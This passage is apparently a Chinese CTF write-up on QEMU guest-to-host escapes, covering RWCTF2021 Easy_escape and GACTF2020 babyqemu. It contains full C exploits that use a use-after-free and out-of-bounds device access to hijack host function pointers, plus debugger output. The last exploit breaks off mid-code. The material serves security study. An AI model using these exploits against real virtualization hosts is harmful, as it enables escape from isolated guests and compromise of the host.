0x555555554000 0x555555808000 r--p 2b4000 0 /home/ubuntu/Desktop/RWCTF2021_Easy_escape/RWCTF-Easy_escape/qemu-system-x86_64
► 0x555555808000 0x555555ec9000 r-xp 6c1000 2b4000 /home/ubuntu/Desktop/RWCTF2021_Easy_escape/RWCTF-Easy_escape/qemu-system-x86_64 +0x4b9795
0x555555ec9000 0x555556403000 r--p 53a000 975000 /home/ubuntu/Desktop/RWCTF2021_Easy_escape/RWCTF-Easy_escape/qemu-system-x86_64
再次创建 req 。
之后 fun_mmio_write->handle_data_read->dma_memory_read 时 UAF 修改 req.list[1] 的 fd 指向 req。
1 2 3 4 5 6 7 *(size_t*)(buf + (1 << 10 )) = req_addr; mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(ADDR, buf_paddr); mmio_write32(INDEX, 1 ); mmio_write32(RESULT_ADDR, mmio_phys_base() + DELETE_REQ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_write32(HANDLE_DATA, 0x1919810 );
0x410 [ 4] : 0x7fffa91eec00 —▸ 0x7fffa9165c00 —▸ 0x7fffa90dc400 ◂— 0x7fffa91eec00
再次创建 req 时 req.list[2] 指向 req 。此时实现了 req 的自写,其中 lreq.ist[0] 为 NULL 时因为 tcache 在取出 chunk 时会将 key 字段置 0 。
1 2 3 4 mmio_write32(RESULT_ADDR, buf_paddr + 0x400 ); mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_write32(INDEX, 2 );
pwndbg> p *(FunReq*)0x7fffa91eec00
$2 = {
total_size = 2048,
list = {0x0 , 0x7fffa90dc400 "", 0x7fffa91eec00 "", 0x0 <repeats 124 times>}
}
我们可以通过 req 自写将 list[0] 指向目标地址从而实现任意地址读写。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 void arbitrary_address_read (size_t address) { mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(INDEX, 2 ); *(size_t *)(buf + (2 << 10 )) = (3 - 1 ) << 10 ; *(size_t *)(buf + (2 << 10 ) + 8 ) = address; *(size_t *)(buf + (2 << 10 ) + 0x10 ) = 0 ; *(size_t *)(buf + (2 << 10 ) + 0x18 ) = req_addr; mmio_write32(HANDLE_DATA, 0x114514 ); mmio_write32(INDEX, 0 ); mmio_read32(HANDLE_DATA); } void arbitrary_address_write (size_t address) { mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(INDEX, 2 ); *(size_t *)(buf + (2 << 10 )) = (3 - 1 ) << 10 ; *(size_t *)(buf + (2 << 10 ) + 8 ) = address; *(size_t *)(buf + (2 << 10 ) + 0x10 ) = 0 ; *(size_t *)(buf + (2 << 10 ) + 0x18 ) = req_addr; mmio_write32(HANDLE_DATA, 0x114514 ); mmio_write32(INDEX, 0 ); mmio_write32(HANDLE_DATA, 0x1919810 ); }
之后就是常规的泄露 qemu 基址,改 main_loop_tlg 指向的 QEMUTimerList 实现逃逸。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 arbitrary_address_read(qemu_leak_addr); size_t qemu_base = *(size_t *)buf - 0x6761b0 ;printf ("[+] qemu base: %#llx\n" , qemu_base);size_t system_plt = qemu_base + 0x2b8a70 ;printf ("[*] system@plt addr: %#llx\n" , system_plt);size_t main_loop_tlg_addr = qemu_base + 0x112cd40 ;printf ("[*] main_loop_tlg addr: %#llx\n" , main_loop_tlg_addr);arbitrary_address_read(main_loop_tlg_addr); size_t QEMUTimerList_addr = *(size_t *)(buf);printf ("[+] QEMUTimer addr: %#llx\n" , QEMUTimerList_addr);arbitrary_address_read(QEMUTimerList_addr); *(size_t *)(buf + 0x58 ) = system_plt; *(size_t *)(buf + 0x60 ) = QEMUTimerList_addr + 0x200 ; strcpy (buf + 0x200 , "/usr/bin/gnome-calculator" );arbitrary_address_write(QEMUTimerList_addr);
完整 Exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 #include <ctype.h> #include <fcntl.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> #include <unistd.h> #include <stdint.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <errno.h> void qword_dump (char * desc, void * addr, int len) { uint64_t * buf64 = (uint64_t *)addr; uint8_t * buf8 = (uint8_t *)addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <inttypes.h> #include <stdbool.h> #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #define IORESOURCE_MEM 0x00000200ULL typedef struct { volatile uint8_t * bar; size_t size; size_t map_len; int fd; int res_idx; uint64_t phys_start; uint64_t phys_end; unsigned long long res_flags; bool inited; } mmio_ctx_t ; static mmio_ctx_t g_mmio = {0 };static int build_paths (const char * bdf_or_path, char * resource_txt, size_t txt_sz, char * dev_dir, size_t dir_sz) { if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1 ; } if (strchr (bdf_or_path, '/' )) { snprintf (resource_txt, txt_sz, "%s" , bdf_or_path); snprintf (dev_dir, dir_sz, "%s" , bdf_or_path); char * slash = strrchr (dev_dir, '/' ); if (!slash) { errno = EINVAL; return -1 ; } *slash = '\0' ; if (strstr (resource_txt, "/resource" ) && resource_txt[strlen (resource_txt) - 1 ] >= '0' && resource_txt[strlen (resource_txt) - 1 ] <= '9' ) { snprintf (resource_txt, txt_sz, "%s/resource" , dev_dir); } } else { snprintf (resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource" , bdf_or_path); snprintf (dev_dir, dir_sz, "/sys/bus/pci/devices/%s" , bdf_or_path); } return 0 ; } static int parse_mem_bar (const char * resource_txt, int bar_idx, unsigned long long * start, unsigned long long * end, unsigned long long * flags, int * picked_idx) { FILE* fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long s = 0 , e = 0 , f = 0 ; if (sscanf (line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } int mmio_init (const char * bdf_or_path, int bar_idx) { if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof (resource_txt), dev_dir, sizeof (dev_dir)) != 0 ) return -1 ; unsigned long long start = 0 , end = 0 , flags = 0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0 ) return -1 ; size_t size = (size_t )((end - start) + 1ULL ); size_t pg = (size_t )sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf (res_path, sizeof (res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open(res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; void * map = mmap(NULL , map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t *)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.phys_start = (uint64_t )start; g_mmio.phys_end = (uint64_t )end; g_mmio.res_flags = flags; g_mmio.inited = true ; return 0 ; } void mmio_fini (void ) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset (&g_mmio, 0 , sizeof (g_mmio)); } volatile void * mmio_base (void ) { return g_mmio.bar; }size_t mmio_size (void ) { return g_mmio.size; }int mmio_bar_index (void ) { return g_mmio.res_idx; }uint64_t mmio_phys_base (void ) { return g_mmio.phys_start; }uint64_t mmio_phys_limit (void ) { return g_mmio.phys_end; } uint64_t mmio_offset_to_phys (size_t off) { if (!g_mmio.inited) { errno = EPERM; return 0 ; } if (off >= g_mmio.size) { errno = ERANGE; return 0 ; } return g_mmio.phys_start + (uint64_t )off; } uint64_t mmio_virt_to_phys (const void * p) { if (!g_mmio.inited || !p) { errno = EPERM; return 0 ; } uintptr_t base = (uintptr_t )g_mmio.bar; uintptr_t addr = (uintptr_t )p; if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0 ; } size_t off = (size_t )(addr - base); return g_mmio.phys_start + (uint64_t )off; } static inline int chk (size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } uint8_t mmio_read8 (size_t off) { if (chk(off, 1 )) return 0 ; return *(volatile uint8_t *)(g_mmio.bar + off); } uint16_t mmio_read16 (size_t off) { if (chk(off, 2 )) return 0 ; return *(volatile uint16_t *)(g_mmio.bar + off); } uint32_t mmio_read32 (size_t off) { if (chk(off, 4 )) return 0 ; return *(volatile uint32_t *)(g_mmio.bar + off); } uint64_t mmio_read64 (size_t off) { if (chk(off, 8 )) return 0 ; return *(volatile uint64_t *)(g_mmio.bar + off); } void mmio_write8 (size_t off, uint8_t v) { if (chk(off, 1 )) return ; *(volatile uint8_t *)(g_mmio.bar + off) = v; } void mmio_write16 (size_t off, uint16_t v) { if (chk(off, 2 )) return ; *(volatile uint16_t *)(g_mmio.bar + off) = v; } void mmio_write32 (size_t off, uint32_t v) { if (chk(off, 4 )) return ; *(volatile uint32_t *)(g_mmio.bar + off) = v; } void mmio_write64 (size_t off, uint64_t v) { if (chk(off, 8 )) return ; *(volatile uint64_t *)(g_mmio.bar + off) = v; } volatile void * mmio_ptr (size_t off) { if (chk(off, 1 )) return NULL ; return (volatile void *)(g_mmio.bar + off); } #include <stdint.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <errno.h> static uint64_t virt_to_phys (void * vaddr) { long pagesize = sysconf(_SC_PAGESIZE); uint64_t va = (uint64_t )vaddr; uint64_t page_index = va / pagesize; uint64_t offset = page_index * sizeof (uint64_t ); int fd = open("/proc/self/pagemap" , O_RDONLY); if (fd < 0 ) return 0 ; uint64_t entry = 0 ; ssize_t n = pread(fd, &entry, sizeof (entry), offset); close(fd); if (n != sizeof (entry)) return 0 ; if (!(entry & (1ULL << 63 )) || (entry & (1ULL << 62 ))) { errno = EFAULT; return 0 ; } uint64_t pfn = entry & ((1ULL << 55 ) - 1 ); return (pfn * pagesize) + (va % pagesize); } enum FUN_OPT { SIZE = 0x00 , ADDR = 0x04 , RESULT_ADDR = 0x08 , INDEX = 0x0C , HANDLE_DATA = 0x10 , CREATE_REQ = 0x14 , DELETE_REQ = 0x18 }; uint8_t buf[3 << 10 ];size_t req_addr;void arbitrary_address_read (size_t address) { mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(INDEX, 2 ); *(size_t *)(buf + (2 << 10 )) = (3 - 1 ) << 10 ; *(size_t *)(buf + (2 << 10 ) + 8 ) = address; *(size_t *)(buf + (2 << 10 ) + 0x10 ) = 0 ; *(size_t *)(buf + (2 << 10 ) + 0x18 ) = req_addr; mmio_write32(HANDLE_DATA, 0x114514 ); mmio_write32(INDEX, 0 ); mmio_read32(HANDLE_DATA); } void arbitrary_address_write (size_t address) { mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(INDEX, 2 ); *(size_t *)(buf + (2 << 10 )) = (3 - 1 ) << 10 ; *(size_t *)(buf + (2 << 10 ) + 8 ) = address; *(size_t *)(buf + (2 << 10 ) + 0x10 ) = 0 ; *(size_t *)(buf + (2 << 10 ) + 0x18 ) = req_addr; mmio_write32(HANDLE_DATA, 0x114514 ); mmio_write32(INDEX, 0 ); mmio_write32(HANDLE_DATA, 0x1919810 ); } int main (int argc, char * argv[]) { mmio_init("0000:00:04.0" , 0 ); mmio_write32(ADDR, virt_to_phys(buf)); mmio_write32(RESULT_ADDR, mmio_phys_base() + DELETE_REQ); mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(INDEX, 0 ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_read32(HANDLE_DATA); qword_dump("leak req addr from tcache_perthread_struct (req->list[0])" , buf, 0x400 ); req_addr = *(size_t *)(buf + 0x278 ); printf ("[+] req addr: %#llx\n" , req_addr); size_t qemu_leak_addr = *(size_t *)(buf + 0x358 ); printf ("[+] qemu_leak addr: %#llx\n" , qemu_leak_addr); mmio_write32(SIZE, (3 - 1 ) << 10 ); *(size_t *)(buf + (1 << 10 )) = req_addr; mmio_write32(INDEX, 1 ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_write32(HANDLE_DATA, 0x1919810 ); mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_write32(RESULT_ADDR, virt_to_phys(buf) + 0x400 ); arbitrary_address_read(qemu_leak_addr); size_t qemu_base = *(size_t *)buf - 0x6761b0 ; printf ("[+] qemu base: %#llx\n" , qemu_base); size_t system_plt = qemu_base + 0x2b8a70 ; printf ("[*] system@plt addr: %#llx\n" , system_plt); size_t main_loop_tlg_addr = qemu_base + 0x112cd40 ; printf ("[*] main_loop_tlg addr: %#llx\n" , main_loop_tlg_addr); arbitrary_address_read(main_loop_tlg_addr); size_t QEMUTimerList_addr = *(size_t *)(buf); printf ("[+] QEMUTimerList addr: %#llx\n" , QEMUTimerList_addr); arbitrary_address_read(QEMUTimerList_addr); *(size_t *)(buf + 0x58 ) = system_plt; *(size_t *)(buf + 0x60 ) = QEMUTimerList_addr + 0x200 ; strcpy (buf + 0x200 , "/usr/bin/gnome-calculator" ); arbitrary_address_write(QEMUTimerList_addr); return 0 ; }
GACTF2020 babyqemu 虚拟机密码为 root
环境搭建 由于利用方法不受环境影响,没有用 docker 环境。启动脚本需要修改路径为相对路径。
1 2 3 4 5 sudo add-apt-repository ppa:linuxuprising/libpng12sudo apt install libpng12-0sudo add-apt-repository universesudo apt install libncursesw5
调试时需要添加 -monitor /dev/null 参数,这样 Ctrl-C 能切换到 gdb 调试。
1 2 3 4 5 6 7 8 gdb -args ./qemu-system-x86_64 \ -kernel ./vmlinuz-4.8.0-52-generic \ -append "console=ttyS0 root=/dev/ram oops=panic panic=1 quiet" \ -initrd ./rootfs.cpio \ -m 2G -nographic \ -monitor /dev/null \ -L ./pc-bios -smp 1 \ -device denc
因为你用 -nographic 时,QEMU 会默认把“监控台+串口”复用到当前终端的 stdio(等价于 -serial mon:stdio) 。
这个复用模式会把你的终端切到 raw 模式 (关闭 ISIG),于是你按下 Ctrl-C 不再触发终端的 SIGINT,而只是一个普通字节 0x03 被 QEMU/guest 吃掉了,gdb 收不到中断,自然“按不进去”。
你加了这句——
就等于显式关闭了 -nographic 的“隐式 mon:stdio” :QEMU 不再把 monitor 绑到你的终端,也就**不会把终端切 raw、不会吞掉 Ctrl-C**。这样 Ctrl-C 又会作为 SIGINT 先到 gdb,gdb 才能打断并停住被调试的 QEMU 进程。
漏洞分析 设备相关的符号被去除。可以通过搜索 denc-mmio 定位到相关函数。
存在一处花指令,直接去除。
1 2 3 4 .text: 00000000003AA140 E8 00 00 00 00 call $+5 .text: 00000000003AA140.text: 00000000003AA145 83 04 24 05 add dword ptr [rsp ], 5 .text: 00000000003AA149 C3 retn
题目部分代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 #include "qemu/osdep.h" #include "qapi/error.h" #include "qemu/module.h" #include "hw/pci/pci.h" #include "exec/memory.h" #define TYPE_PCI_DENC "denc" OBJECT_DECLARE_SIMPLE_TYPE(DencState, PCI_DENC) typedef uint64_t (*DencFun) (uint32_t *buf, uint64_t a, uint64_t b) ;typedef struct DencState { PCIDevice parent_obj; MemoryRegion mmio; MemoryRegion pmio; uint64_t pad; uint8_t seed[32 ]; uint8_t key[40 ]; uint32_t buf[8 ]; DencFun fun; } DencState; static uint64_t denc_mmio_read (void *opaque, hwaddr addr, unsigned size) { DencState *s = opaque; if (size != 4 || (addr & 3 )) { return (uint64_t )-1 ; } if (addr <= 0x24 ) { return s->buf[addr >> 2 ]; } return 0 ; } static void denc_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { DencState *s = opaque; if (size == 4 && ((addr & 3 ) == 0 )) { if (addr <= 0x24 ) { s->buf[addr >> 2 ] = (uint32_t )val ^ (*(uint32_t *)(s->key + off)); } } } static const MemoryRegionOps denc_mmio_ops = { .read = denc_mmio_read, .write = denc_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, }; static uint64_t denc_pmio_read (void *opaque, hwaddr addr, unsigned size) { DencState *s = opaque; if (size != 4 || (addr & 3 )) { return (uint64_t )-1 ; } if (addr > 0x1F ) { return 0 ; } return s->buf[addr >> 2 ]; } static void denc_pmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { DencState *s = opaque; if (size == 4 && addr % 4 == 0 )) { if (addr <= 0x1F ) { s->buf[addr >> 2 ] = (uint32_t )val ^ (*(uint32_t *)(s->key + off)); } if (addr == 0x660 ) { s->fun(s->buf, 0 , 0 ); } } } static const MemoryRegionOps denc_pmio_ops = { .read = denc_pmio_read, .write = denc_pmio_write, .endianness = DEVICE_NATIVE_ENDIAN, }; static void denc_realize (PCIDevice *pdev, Error **errp) { DencState *s = PCI_DENC(pdev); memory_region_init_io(&s->mmio, OBJECT(s), &denc_mmio_ops, s, "denc-mmio" , 0x1000 ); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio); memory_region_init_io(&s->pmio, OBJECT(s), &denc_pmio_ops, s, "denc-pmio" , 0x1000 ); pci_register_bar(pdev, 1 , PCI_BASE_ADDRESS_SPACE_IO, &s->pmio); } static void denc_class_init (ObjectClass *klass, void *data) { DeviceClass *dc = DEVICE_CLASS(klass); PCIDeviceClass *k = PCI_DEVICE_CLASS(klass); k->realize = denc_realize; k->vendor_id = 0x1234 ; k->device_id = 0x11E9 ; k->revision = 0x01 ; k->class_id = PCI_CLASS_OTHERS; device_categorizable_set_bit(dc, DEVICE_CATEGORY_MISC); }
denc_mmio_read 和 denc_mmio_write 存在越界读写,虽然写入写的值会异或 key,但是读取的值没有被异或,因此我们首先可以直接通过越界读泄露地址:
1 2 3 4 size_t qemu_base = (mmio_read32(0x20 ) | (uint64_t )mmio_read32(0x24 ) << 32 ) - 0x3a9ea8 ;printf ("[*] qemu_base: %#llx\n" , qemu_base);size_t system_plt = qemu_base + 0x2ccb60 ;printf ("[*] system@plt addr: %#llx\n" , system_plt);
同时我们可以通过将写入的值与读取的值异或得到对应位置的 key。
1 2 3 4 5 6 7 uint32_t key[10 ];for (int i = 0 ; i < 10 ; i++){ mmio_write32(i * 4 , 0 ); key[i] = mmio_read32(i * 4 ); } qword_dump("leak key" , key, sizeof (key));
之后越界修改函数指针并调用:
1 2 3 4 5 6 7 8 9 10 char cmd[] = "/usr/bin/gnome-calculator" ;for (int i = 0 ; i < strlen (cmd); i += 4 ){ mmio_write32(i, (*(uint32_t *)&cmd[i]) ^ key[i / 4 ]); } mmio_write32(8 * 4 , (system_plt & 0xFFFFFFFF ) ^ key[8 ]); mmio_write32(9 * 4 , (system_plt >> 32 ) ^ key[9 ]); pio_write32(0x660 , 0x114514 );
完整 Exp 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 #define _GNU_SOURCE #include <ctype.h> #include <errno.h> #include <inttypes.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/io.h> #include <unistd.h> #define IORESOURCE_IO 0x00000100ULL typedef struct { uint16_t base; uint32_t size; uint16_t grant_base; uint32_t grant_len; bool have_ioperm; bool have_iopl; bool inited; } pio_ctx_t ; static pio_ctx_t g_pio = {0 };static int parse_io_bar (const char * bdf_or_path, int bar_idx, uint16_t * out_base, uint32_t * out_size) { char path[256 ]; if (strchr (bdf_or_path, '/' )) { snprintf (path, sizeof (path), "%s" , bdf_or_path); } else { snprintf (path, sizeof (path), "/sys/bus/pci/devices/%s/resource" , bdf_or_path); } FILE* fp = fopen(path, "r" ); if (!fp) return -1 ; int idx = 0 , chosen = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long start = 0 , end = 0 , flags = 0 ; if (sscanf (line, "%llx %llx %llx" , &start, &end, &flags) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(flags & IORESOURCE_IO)) { fclose(fp); errno = EINVAL; return -1 ; } if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } else { if (idx <= 5 && (flags & IORESOURCE_IO)) { if (end < start || start > 0xFFFF ULL) { fclose(fp); errno = ERANGE; return -1 ; } *out_base = (uint16_t )start; *out_size = (uint32_t )(end - start + 1 ); chosen = idx; break ; } } idx++; } fclose(fp); if (chosen < 0 ) { errno = ENOENT; return -1 ; } return 0 ; } static int acquire_io_priv (uint16_t base, uint32_t size, uint16_t * grant_base, uint32_t * grant_len, bool * have_ioperm, bool * have_iopl) { uint32_t len = size; if ((unsigned )base + len > 0x10000 u) len = 0x10000 u - base; if (len == 0 ) len = 1 ; if (ioperm(base, len, 1 ) == 0 ) { *grant_base = base; *grant_len = len; *have_ioperm = true ; *have_iopl = false ; return 0 ; } if (iopl(3 ) == 0 ) { *grant_base = 0 ; *grant_len = 0 ; *have_ioperm = false ; *have_iopl = true ; return 0 ; } return -1 ; } int pio_init (const char * bdf_or_path, int bar_idx) { if (g_pio.inited) { errno = EALREADY; return -1 ; } uint16_t base = 0 ; uint32_t size = 0 ; if (parse_io_bar(bdf_or_path, bar_idx, &base, &size) != 0 ) return -1 ; uint16_t gbase = 0 ; uint32_t glen = 0 ; bool have_perm = false , have_iopl = false ; if (acquire_io_priv(base, size, &gbase, &glen, &have_perm, &have_iopl) != 0 ) return -1 ; g_pio.base = base; g_pio.size = size; g_pio.grant_base = gbase; g_pio.grant_len = glen; g_pio.have_ioperm = have_perm; g_pio.have_iopl = have_iopl; g_pio.inited = true ; return 0 ; } void pio_fini (void ) { if (!g_pio.inited) return ; if (g_pio.have_ioperm) (void )ioperm(g_pio.grant_base, g_pio.grant_len, 0 ); if (g_pio.have_iopl) (void )iopl(0 ); memset (&g_pio, 0 , sizeof (g_pio)); } uint16_t pio_base (void ) { return g_pio.base; }uint32_t pio_size (void ) { return g_pio.size; }static inline int pio_port (uint32_t off, int width, uint16_t * port_out) { if (!g_pio.inited) { errno = EPERM; return -1 ; } if ((uint64_t )off + (uint64_t )width > g_pio.size) { errno = ERANGE; return -1 ; } uint32_t p = (uint32_t )g_pio.base + off; if (p > 0xFFFF u) { errno = ERANGE; return -1 ; } *port_out = (uint16_t )p; return 0 ; } uint8_t pio_read8 (uint32_t off) { uint16_t p; if (pio_port(off, 1 , &p)) return 0 ; return inb(p); } uint16_t pio_read16 (uint32_t off) { uint16_t p; if (pio_port(off, 2 , &p)) return 0 ; return inw(p); } uint32_t pio_read32 (uint32_t off) { uint16_t p; if (pio_port(off, 4 , &p)) return 0 ; return inl(p); } void pio_write8 (uint32_t off, uint8_t v) { uint16_t p; if (pio_port(off, 1 , &p)) return ; outb(v, p); } void pio_write16 (uint32_t off, uint16_t v) { uint16_t p; if (pio_port(off, 2 , &p)) return ; outw(v, p); } void pio_write32 (uint32_t off, uint32_t v) { uint16_t p; if (pio_port(off, 4 , &p)) return ; outl(v, p); } #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <inttypes.h> #include <stdbool.h> #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #define IORESOURCE_MEM 0x00000200ULL typedef struct { volatile uint8_t * bar; size_t size; size_t map_len; int fd; int res_idx; uint64_t phys_start; 